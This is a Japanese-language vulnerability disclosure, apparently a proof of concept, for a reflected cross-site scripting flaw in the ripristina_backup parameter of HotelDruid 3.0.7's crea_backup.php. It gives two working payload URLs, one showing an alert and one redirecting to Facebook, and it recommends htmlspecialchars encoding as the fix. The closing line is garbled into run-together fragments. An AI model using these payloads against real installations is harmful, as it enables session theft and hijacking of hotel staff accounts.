
リフレクション型XSS脆弱性の概念実証 for HotelDruid 3.0.7、crea_backup.php 内の ripristina_backup パラメータを介した任意のJavaScript実行を示します。
DigitalDruid HotelDruid v.3.0.7 におけるクロスサイトスクリプティング脆弱性により、攻撃者は crea_backup.php エンドポイントの ripristina_backup パラメータを介して任意のコードを実行し、機密情報を取得することが可能です。
攻撃者は、認証されたユーザーを細工されたURLにアクセスさせ、そのブラウザで悪意のあるJavaScriptを実行させる可能性があります。考えられる影響は以下の通りです:
http://localhost/hoteldruid/crea_backup.php?anno=2025&id_sessione=<valid_session_id>&azione=SI&ripristina_backup=%22%3E%3CscrIpt%3Ealert%28%27Huy%20Vo%20Found%20This%20Vulnerability%27%29%3B%3C%2FscrIpt%3E&dati_conn=attuali&mantieni_anni=1
結果: 「Huy Vo Found This Vulnerability」というメッセージのポップアップアラートが表示され、XSSの実行が成功したことを確認します。
http://localhost/hoteldruid/crea_backup.php?anno=2025&id_sessione=<valid_session_id>&azione=SI&ripristina_backup="><scrIpt>window.location.href='https://www.facebook.com';</scrIpt>&dati_conn=attuali&mantieni_anni=1
結果: ブラウザが自動的にFacebookにリダイレクトされます。
HotelDruid は、ホテル、B&B、その他の宿泊施設の予約、部屋、請求書管理に使用されるオープンソースのプロパティ管理システムです。Webベースで、通常はローカルサーバーにインストールされ、ブラウザからアクセスします。Webインターフェースと管理機能を考慮すると、特に認証された機能において強固なセキュリティが重要です。
crea_backup.php エンドポイントは、ripristina_backup パラメータをサニタイズやエンコードなしで処理し、ユーザー入力をそのままページに反映します。これにより、攻撃者は悪意のあるURLを作成し、認証されたユーザーに表示されるページに任意のJavaScriptを注入することが可能になります。
ripristina_backupcrea_backup.phpid_sessione) が必要ripristina_backup にペイロードを注入した悪意のあるURLを作成します。htmlspecialchars() を使用して < と > をエンコードする)。